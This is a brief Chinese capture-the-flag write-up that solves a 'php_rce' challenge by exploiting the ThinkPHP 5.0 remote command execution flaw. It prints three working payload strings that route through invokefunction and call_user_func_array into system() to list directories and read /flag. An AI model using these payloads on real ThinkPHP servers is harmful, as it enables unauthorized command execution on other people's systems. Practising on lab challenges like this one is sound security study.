php_rce

php_rce

知识点

thinkphp5.0版本的框架存在远程命令执行漏洞

思路

进去页面,提示这是ThinkPhP v5的框架,百度一下看下有没有什么漏洞。发现有远程命令执行的漏洞。我们直接用百度的payload,进行远程命令执行

s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls  /

s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/NineOne/p/13823848.html